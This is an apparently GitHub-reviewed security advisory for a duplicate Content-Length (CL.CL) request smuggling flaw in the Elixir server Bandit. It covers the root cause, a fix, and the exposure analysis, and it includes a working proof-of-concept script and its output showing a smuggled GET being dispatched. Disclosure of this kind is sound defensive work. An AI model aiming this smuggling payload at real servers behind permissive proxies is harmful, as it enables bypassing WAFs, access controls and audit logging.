Bandit is vulnerable to CL.CL HTTP request smuggling: it silently accepts requests with two Content-Length headers whose values differ, takes the first value, and dispatches the body bytes as a second pipelined request on the same keep-alive connection. RFC 9110 §5.3 prohibits multiple lines for singleton fields like Content-Length, and RFC 9112 §6.3 item 5 requires the recipient to treat invalid Content-Length as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length and forwards rather than rejects, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging.
The vulnerability was introduced prior to v0.1.0 (released Nov 5, 2020) on Nov 16, 2019: https://github.com/mtrudel/bandit/commit/e5270b1b19e9f3574aa0f87ec76851d66c38c0af
Bandit.Headers.get_content_length/1 (lib/bandit/headers.ex) calls List.keyfind/3, which returns only the first matching header. Bandit already correctly rejects the comma-separated form (Content-Length: 0, 43) when values differ; the bug is that the multi-line form never reaches that check.
Fix: collect every Content-Length value from the header list and reject unless all values parse and are byte-identical — extending the existing rejection to the multi-line case.
The script below boots a local Bandit server with a Plug that echoes the dispatched method and path, then sends a POST with Content-Length: 0 followed by Content-Length: 43 and a 43-byte body containing a valid GET /smuggled HTTP/1.1 request line. Run with elixir script.exs
On Bandit 1.10.4 / Elixir 1.18, default config: two 200 OK responses on the same TCP connection. First body method=POST path=/, second body method=GET path=/smuggled. Bandit accepted the malformed request and dispatched the embedded request line as a second request.
Spec violation that becomes request smuggling when paired with a permissive frontend. Practical impact depends entirely on what sits between the internet and Bandit, not on what runs above it.
The application framework (Phoenix, LiveView, Phoenix-API + React SPA) is irrelevant — smuggled requests still flow through the full Plug pipeline, so application auth still runs. The attacker is someone hitting the API directly with curl, not the SPA.
Real exposure concentrates at boundary controls the proxy enforces and Bandit doesn't see: edge WAF, path-based ACLs at the LB, edge rate limiting, centralized audit logging, and — the only realistic data-exfil path — response-queue desync on pooled upstream connections.
Most major frontends already reject CL.CL (Cloudflare, AWS ALB, current nginx, HAProxy in default strict mode). Realistic exposure: custom proxies, older nginx, in-house API gateways, or multi-hop setups where one hop is permissive.
Worth fixing regardless — the current behavior silently shifts security responsibility onto whichever proxy is deployed.
# Bandit HTTP/1 duplicate Content-Length first-wins PoC.
#
# Bandit.Headers.get_content_length/1 calls List.keyfind/3, which returns the
# first Content-Length value and silently ignores additional Content-Length
# entries. RFC 9112 §6.3 explicitly classifies this as an unrecoverable error
# and says the recipient MUST treat it as such.
#
# This is the classic CL.CL request-smuggling primitive. If a fronting proxy
# uses the *last* Content-Length while Bandit uses the first (or vice versa),
# the second "request" embedded in the first request's body gets dispatched
# as a new request on the same keep-alive connection - after the proxy has
# already applied its access controls.
#
# Run: elixir scripts/bandit/http1_duplicate_content_length.exs
Mix.install([
{:bandit, "~> 1.10"},
{:plug, "~> 1.19"}
])
defmodule DemoApp do
@behaviour Plug
import Plug.Conn
def init(opts), do: opts
def call(conn, _opts) do
send_resp(conn, 200, "method=#{conn.method} path=#{conn.request_path}\n")
end
end
defmodule Smuggle do
@port 4321
def run do
{:ok, _} = Bandit.start_link(plug: DemoApp, ip: {127, 0, 0, 1}, port: @port)
request = build_smuggling_request()
log("Sending #{byte_size(request)}-byte CL.CL request:\n#{request}")
{:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])
:ok = :gen_tcp.send(sock, request)
response = read_all(sock)
:gen_tcp.close(sock)
log("Response stream:\n#{response}")
diagnose(response)
end
# POST with two Content-Length headers, plus a smuggled GET line in the
# body. A CL-last frontend would forward the body bytes; Bandit (CL-first)
# reads 0 bytes per Content-Length: 0, replies, and the smuggled request
# line either gets parsed as a new request on the keep-alive connection
# or stays in the buffer.
defp build_smuggling_request do
smuggled_request = "GET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
smuggled_size = byte_size(smuggled_request)
"POST / HTTP/1.1\r\n" <>
"Host: 127.0.0.1\r\n" <>
"Content-Length: 0\r\n" <>
"Content-Length: #{smuggled_size}\r\n" <>
"\r\n" <>
smuggled_request
end
defp read_all(sock, accumulated \\ "") do
case :gen_tcp.recv(sock, 0, 2_000) do
{:ok, bytes} -> read_all(sock, accumulated <> bytes)
{:error, _reason} -> accumulated
end
end
# Three observable outcomes:
# - 400 Bad Request -> RFC-conformant rejection (not what current
# Bandit does).
# - Two responses, second one for /smuggled -> Bandit dispatched the
# smuggled request as a second pipelined request.
# - One response -> Bandit accepted Content-Length: 0, the smuggled
# bytes sat in the keep-alive buffer; with a CL-last frontend this
# becomes a smuggled request on the next request boundary.
defp diagnose(response) do
response_lines = Regex.scan(~r/^HTTP\/1\.[01] \d{3}[^\r\n]*/m, response) |> List.flatten()
log("HTTP/1.x response lines observed: #{length(response_lines)}")
Enum.each(response_lines, fn line -> log(" #{line}") end)
cond do
response =~ ~r/^HTTP\/1\.[01] 400/ ->
log("OK: Bandit rejected duplicate Content-Length (RFC 9112 §6.3 conformant).")
response =~ "/smuggled" ->
log("VULNERABLE: smuggled GET /smuggled was processed as a second request.")
length(response_lines) == 1 ->
log("ACCEPTED: Bandit took the first Content-Length (0) and left the")
log("smuggled request line in the keep-alive buffer. Combined with a")
log("CL-last frontend this becomes request smuggling.")
true ->
log("Inconclusive - see raw response above.")
end
end
defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end
Smuggle.run()
11:52:23.036 [info] Running DemoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[09:52:23.039] Sending 118-byte CL.CL request:
POST / HTTP/1.1
Host: 127.0.0.1
Content-Length: 0
Content-Length: 43
GET /smuggled HTTP/1.1
Host: 127.0.0.1
[09:52:25.057] Response stream:
HTTP/1.1 200 OK
date: Tue, 28 Apr 2026 09:52:22 GMT
content-length: 19
vary: accept-encoding
cache-control: max-age=0, private, must-revalidate
method=POST path=/
HTTP/1.1 200 OK
date: Tue, 28 Apr 2026 09:52:22 GMT
content-length: 26
vary: accept-encoding
cache-control: max-age=0, private, must-revalidate
method=GET path=/smuggled
[09:52:25.057] HTTP/1.x response lines observed: 2
[09:52:25.057] HTTP/1.1 200 OK
[09:52:25.057] HTTP/1.1 200 OK
[09:52:25.058] VULNERABLE: smuggled GET /smuggled was processed as a second request.
{
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"severity": "MODERATE",
"github_reviewed_at": "2026-05-07T03:46:31Z",
"nvd_published_at": "2026-05-01T21:16:17Z"
}